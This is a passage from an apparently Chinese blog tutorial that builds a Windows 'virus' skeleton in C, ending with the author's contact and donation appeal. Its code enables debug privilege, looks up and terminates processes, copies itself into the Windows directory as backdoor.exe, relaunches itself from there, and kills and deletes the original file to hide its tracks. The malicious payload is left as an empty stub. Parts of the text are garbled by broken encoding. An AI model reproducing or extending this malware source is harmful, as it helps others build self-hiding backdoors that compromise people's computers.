//? 調(diào)整權(quán)限
VOID DebugPrivilege()
{
??? HANDLE hToken = NULL;
???
??? BOOL bRet =OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
???
??? if ( bRet == TRUE )
??? {
??????? TOKEN_PRIVILEGES tp;
??????? tp.PrivilegeCount = 1;
???????LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
??????? tp.Privileges[0].Attributes= SE_PRIVILEGE_ENABLED;
???????AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
???????
??????? CloseHandle(hToken);
??? }
}
?
//? 獲得某進(jìn)程的 PID
DWORD GetProcessId(char *szProcessName)
{
??? DWORD dwPid = 0;
??? BOOL bRet = 0;
??? PROCESSENTRY32 pe32 = { 0};
??? pe32.dwSize =sizeof(PROCESSENTRY32);
?
??? HANDLE hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
??? bRet = Process32First(hSnap,&pe32);
?
??? while ( bRet )
??? {
??????? if (strcmp(pe32.szExeFile, szProcessName) == 0 )
??????? {
??????????? break;
??????? }
??????? bRet =Process32Next(hSnap, &pe32);
??? }
?
??? dwPid =pe32.th32ProcessID;
??? return dwPid;
}
?
//? 結(jié)束某進(jìn)程
VOID CloseProcess(DWORD dwPid)
{
??? HANDLE hProcess =OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
??? TerminateProcess(hProcess,0);
??? CloseHandle(hProcess);
}
?
這幾個(gè)函數(shù)完成后,我們就來根據(jù)病毒的流程來完成病毒的主體代碼,代碼如下:
int main(int argc, char **argv)
{
??? // Windows 目錄
??? char szWinDir[MAX_PATH] ={ 0 };
??? //? 當(dāng)前目錄
??? char szCurrDir[MAX_PATH] ={ 0 };
?
???GetWindowsDirectory(szWinDir, MAX_PATH);
??? GetModuleFileName(NULL,szCurrDir, MAX_PATH);
?
??? //? 獲取當(dāng)前的目錄
??? int ch = '\\';
??? char *pFileName =strrchr(szCurrDir, ch);
??? int nLen =strlen(szCurrDir) - strlen(pFileName);
??? szCurrDir[nLen] = NULL;
?
??? if ( strcmp(szWinDir,szCurrDir) == 0 )
??? {
??????? //? 相同目錄
??????? //? 判斷參數(shù)個(gè)數(shù)
??????? //? 根據(jù)參數(shù)個(gè)數(shù)判斷是否需要?jiǎng)h除原病毒文件
??????? //? 如果病毒是開機(jī)自動(dòng)啟動(dòng)的話,不會(huì)帶有參數(shù)
??????? printf("argc = %d\r\n", argc);
??????? if ( argc == 2 )
??????? {
??????????? ch = '\\';
??????????? pFileName =strrchr(argv[1], ch);
??????????? pFileName ++;
???????????printf("pFileName = %s \r\n", pFileName);
??????????? DWORD dwPid =GetProcessId(pFileName);
??????????? printf("dwPid= %d \r\n", dwPid);
??????????? DebugPrivilege();
???????????CloseProcess(dwPid);
??????????? pFileName =argv[1];
???????????printf("pFileName = %s \r\n", pFileName);
??????????? Sleep(3000);
???????????DeleteFile(pFileName);
??????? }
??????? else
??????? {
??????????? //? 病毒的功能代碼
??????? }
??? }
??? else
??? {
??????? //? 不同目錄,說明是第一次運(yùn)行
?
??????? //? 復(fù)制自身到 windows 目錄里下
??????? strcat(szWinDir,"\\backdoor.exe");
???????GetModuleFileName(NULL, szCurrDir, MAX_PATH);
??????? CopyFile(szCurrDir,szWinDir, FALSE);
?
??????? //? 構(gòu)造要運(yùn)行 windows 目錄下的病毒
??????? //? 以及要傳遞的自身位置
??????? strcat(szWinDir," \"");
??????? strcat(szWinDir,szCurrDir);
??????? strcat(szWinDir,"\"");
??????? printf("%s\r\n", szWinDir);
??????? WinExec(szWinDir, SW_SHOW);
??????? Sleep(1000);
??? }
?
??? // getch() 模擬病毒的動(dòng)作
??? //? 保持病毒進(jìn)程不退出
??? getch();
??? return 0;
}
更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主
微信掃碼或搜索:z360901061

微信掃一掃加我為好友
QQ號(hào)聯(lián)系: 360901061
您的支持是博主寫作最大的動(dòng)力,如果您喜歡我的文章,感覺我的文章對(duì)您有幫助,請(qǐng)用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長(zhǎng)非常感激您!手機(jī)微信長(zhǎng)按不能支付解決辦法:請(qǐng)將微信支付二維碼保存到相冊(cè),切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對(duì)您有幫助就好】元
